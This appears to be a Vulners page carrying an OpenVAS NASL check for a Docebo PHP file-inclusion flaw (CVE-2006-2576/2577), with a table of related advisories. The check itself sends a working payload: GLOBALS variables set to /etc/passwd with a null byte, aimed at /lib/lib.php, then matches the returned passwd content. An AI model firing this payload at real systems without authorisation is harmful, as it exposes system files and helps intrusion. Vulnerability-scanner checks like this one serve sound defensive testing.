| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2006-2576 | 24 May 200623:00 | – | cve | |
| CVE-2006-2577 | 24 May 200623:00 | – | cve | |
| CVE-2006-2576 | 24 May 200623:00 | – | cvelist | |
| CVE-2006-2577 | 24 May 200623:00 | – | cvelist | |
| Docebo GLOBALS Variable Overwrite Remote File Inclusion | 17 Aug 200600:00 | – | nessus | |
| EUVD-2006-2577 | 7 Oct 202500:30 | – | euvd | |
| CVE-2006-2576 | 24 May 200623:02 | – | nvd | |
| CVE-2006-2577 | 24 May 200623:02 | – | nvd | |
| Docebo GLOBALS Variable Overwrite Vulnerability (Aug 2008) | 22 Aug 200800:00 | – | openvas | |
| Remote file inclusion | 24 May 200623:02 | – | prion |
| Source | Link |
|---|---|
| secunia | www.secunia.com/advisories/20260/ |
| hardened-php | www.hardened-php.net/advisory_202005.79.html |
# OpenVAS Vulnerability Test
# $Id: docebo_globals_overwrite.nasl 5779 2017-03-30 06:57:12Z cfi $
# Description: Docebo GLOBALS Variable Overwrite Vulnerability
#
# Authors:
# Ferdy Riphagen <f[dot]riphagen[at]nsec[dot]nl>
#
# Copyright:
# Copyright (C) 2006 Ferdy Riphagen
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
tag_summary = "The remote host contains a PHP application that is vulnerable
to remote and local file inclusions.
Description :
At least one Docebo application is installed on the system.
Docebo has multiple PHP based applications, including a content
management system (DoceboCMS), a e-learning platform
(DoceboLMS) and a knowledge maintenance system (DoceboKMS)
By using a flaw in some PHP versions (PHP4 <= 4.4.0 and PHP5 <= 5.0.5)
it is possible to include files by overwriting the $GLOBALS variable.
This flaw exists if PHP's register_globals is enabled.";
tag_solution = "Disable PHP's register_globals and/or upgrade to a newer PHP release.";
# Original advisory / discovered by :
# http://milw0rm.com/exploits/1817
if(description){
script_id(200011);
script_version("$Revision: 5779 $");
script_tag(name:"last_modification", value:"$Date: 2017-03-30 08:57:12 +0200 (Thu, 30 Mar 2017) $");
script_tag(name:"creation_date", value:"2008-08-22 16:09:14 +0200 (Fri, 22 Aug 2008)");
script_tag(name:"cvss_base", value:"5.1");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2006-2576", "CVE-2006-2577");
script_bugtraq_id(18109);
script_xref(name:"OSVDB", value:"25757");
script_name("Docebo GLOBALS Variable Overwrite Vulnerability");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_family("Web application abuses");
script_copyright("This script is Copyright (C) 2006 Ferdy Riphagen");
script_dependencies("find_service.nasl", "http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_xref(name : "URL" , value : "http://secunia.com/advisories/20260/");
script_xref(name : "URL" , value : "http://www.hardened-php.net/advisory_202005.79.html");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
success = FALSE;
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
foreach dir( make_list_unique( "/doceboLms", "/doceboKms", "/doceboCms", "/doceboCore", cgi_dirs( port:port ) ) ) {
if( dir == "/" ) dir = "";
res = http_get_cache(item:string(dir, "/index.php"), port:port);
if (egrep(pattern:"^Set-Cookie:.+docebo_session=", string:res) ||
egrep(pattern:'title="Powered by Docebo(KMS|LMS|CMS)"', string:res) ||
egrep(pattern:"powered_by.+<a href[^/]+\/\/www\.docebo\.org", string:res)) {
uri = "/lib/lib.php";
globals[0] = "GLOBALS[where_framework]=";
globals[1] = "GLOBALS[where_lms]=";
lfile = "/etc/passwd";
for(n = 0; globals[n]; n++) {
req = http_get(item:string(dir, uri, "?", globals[n], lfile, "%00"), port:port);
recv = http_keepalive_send_recv(data:req, port:port, bodyonly:1);
if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv)) {
n++;
success = TRUE;
path += string("http://", get_host_name(), dir, "\n");
}
}
}
}
if (success) {
report = string("Below the full path to the vulnerable Docebo application(s):\n\n", path);
security_message(port:port, data:report);
exit(0);
}
exit(99);Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation